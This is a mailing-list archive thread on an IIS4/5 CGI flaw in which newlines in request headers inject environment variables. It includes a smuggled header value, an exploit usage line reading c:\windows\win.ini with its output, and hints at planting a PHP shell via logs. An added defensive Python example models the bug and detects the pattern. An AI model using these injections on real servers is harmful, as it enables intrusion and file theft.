Full Disclosure mailing list archives
Re: iis cgi 0day
From: YiFei Yang <le.concorde.4590 () gmail com>
Date: Fri, 11 Apr 2014 09:15:52 +0800
On 11 Apr 2014 at 6:29 AM, "Wendel Guglielmetti Henrique" <wsguglielmetti () gmail com> wrote:
Hey YiFei, Interesting. Is there any CVE for it?
I'm not able to find a CVE related to it, so maybe not.
What you mean by CGI with IIS? Just real old CGI files?
Yes, that's what the original post is talking about. Using CGI programs with IIS4/5.
Can you give an example of remote code execution?
I don't have an example, but what the original post said is that, since you can set any environment variable you want, you may as well modify PATH so that it will point to a folder that contains rogue DLLs to be loaded, or, by setting a really long one, cause some CGI programs that assume environment variables' length to overflow their buffer. The way it works is that IIS4/5 converts a \n to a \0 when processing the request header, and it prepends HTTP_ to the header name to make an environment variable for the CGI process. If you send a request that has a header like "a=b\nPATH_TRANSLATED: something", it will become "HTTP_a=b\0PATH_TRANSLATED=something" when IIS processes it, and the part after the \0 will become a separate environment variable. The information above is translated from the original post; I haven't tried the exploit yet, but I will try that when I have some time to spare.
Thanks.

On Thu, Apr 10, 2014 at 2:19 AM, YiFei Yang <le.concorde.4590 () gmail com> wrote:

So, for those of you who don't read Chinese, here's the brief idea of the original post. It is a bug affecting IIS4/5 using CGI on Windows NT/2000. Microsoft is aware of it and won't fix it. The discovery of the bug was back in year 2011. By exploiting this bug, the attacker can set arbitrary environment variables for the CGI process on the target machine, which can be further exploited to get sensitive information, or cause remote code execution.

2014-04-10 10:25 GMT+08:00 yuange <yuange1975 () hotmail com>:

Discovered in 2000 for IIS4\IIS5 0day. .php -> php.exe the exploit file ver 4.1.1 . http://seclists.org/fulldisclosure/2012/Apr/13

usage: iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini

yuan can get the file c:\windows\win.ini

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 10 Apr 2014 02:11:37 GMT
Connection: close
X-Powered-By: PHP/4.0.0
Content-type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
ivf=MPEGVideo
m3u=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpv2=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wvx=MPEGVideo
[SciCalc]
layout=0

You can use the IIS log file to write a phpshell, and execute the PHP call system cmd.

Date: Wed, 9 Apr 2014 23:11:28 +0300
From: kirils.solovjovs () kirils com
To: yuange1975 () hotmail com
Subject: Re: [FD] iis cgi 0day

Sorry, I don't read Chinese. How is this a 0day?

-- Kirils Solovjovs

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

-- Wendel Guglielmetti Henrique
http://wsec.110mb.com/ - Personal HomePage
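The header-to-environment conversion YiFei describes, as an added illustration that is not part of this thread and is neither IIS code nor the posted exploit: a small Python model of the parsing behaviour the post attributes to IIS 4/5 (the model is an assumption made for illustration), placed beside a hardened environment builder that refuses control characters in header names and values, and a detection helper that a reverse proxy or log reviewer could apply to flag the same pattern. The sample headers are constructed.

```python
import re

# Constructed sample headers (not from the original post): a benign header
# and one carrying the newline-injection pattern the thread describes.
SAMPLE_HEADERS = [
    ("Host", "example.test"),
    ("a", "b\nPATH_TRANSLATED: something"),
]

# RFC 7230 "token" characters, the only ones allowed in a header field name.
_TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
# CR, LF, NUL and other control characters that must never reach an
# environment block.
_CTL_RE = re.compile(r"[\x00-\x1f\x7f]")


def cgi_meta_name(header_name):
    """CGI meta-variable name for a request header (RFC 3875, section 4.1.18)."""
    return "HTTP_" + header_name.upper().replace("-", "_")


def model_legacy_env(headers):
    """Model of the behaviour the thread attributes to IIS 4/5 (an assumption
    for illustration, not IIS code): a "\\n" in the value becomes "\\0", and the
    environment block is later read as NUL-separated NAME=VALUE strings, so the
    text after the newline turns into its own variable without the HTTP_ prefix."""
    block = "".join(
        cgi_meta_name(n) + "=" + v.replace("\n", "\0") + "\0" for n, v in headers
    )
    env = {}
    for entry in filter(None, block.split("\0")):
        if "=" in entry:
            k, v = entry.split("=", 1)
        else:  # "NAME: value" fragment produced by the injected text
            k, _, v = entry.partition(":")
        env[k.strip()] = v.strip()
    return env


def build_cgi_env_hardened(headers):
    """Hardened builder: restrict names to token characters and reject control
    characters in values, so every emitted key carries the HTTP_ prefix."""
    env = {}
    for name, value in headers:
        if not _TOKEN_RE.match(name) or _CTL_RE.search(value):
            raise ValueError(
                "rejected header %r: control or non-token characters" % name
            )
        env[cgi_meta_name(name)] = value
    return env


def find_injected_headers(headers):
    """Detection helper for a proxy or log review: names of headers whose name
    or value contains CR, LF, NUL or another control character."""
    return [n for n, v in headers if _CTL_RE.search(n) or _CTL_RE.search(v)]


if __name__ == "__main__":
    print("legacy model:", model_legacy_env(SAMPLE_HEADERS))
    print("flagged:", find_injected_headers(SAMPLE_HEADERS))
    try:
        build_cgi_env_hardened(SAMPLE_HEADERS)
    except ValueError as exc:
        print("hardened builder:", exc)
```

Running the block shows the legacy model emitting a bare PATH_TRANSLATED variable from the second sample header, while the hardened builder rejects that header outright and the detector names it; for the benign header alone, the hardened builder returns only HTTP_HOST. Rejecting at the edge matters more than the prefix check itself, because once a NUL has split the block no downstream component can tell the injected variable from a legitimate one.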
Current thread:
- iis cgi 0day yuange (Apr 09)
- Message not available
- Re: iis cgi 0day yuange (Apr 09)
- Message not available
- <Possible follow-ups>
- Re: iis cgi 0day YiFei Yang (Apr 10)
- Message not available
- Re: iis cgi 0day YiFei Yang (Apr 10)
- Message not available
- Re: iis cgi 0day Davide Davini (Apr 16)
- Re: iis cgi 0day Reindl Harald (Apr 16)
- Re: iis cgi 0day Homer Parker (Apr 18)
- Re: iis cgi 0day YiFei Yang (Apr 18)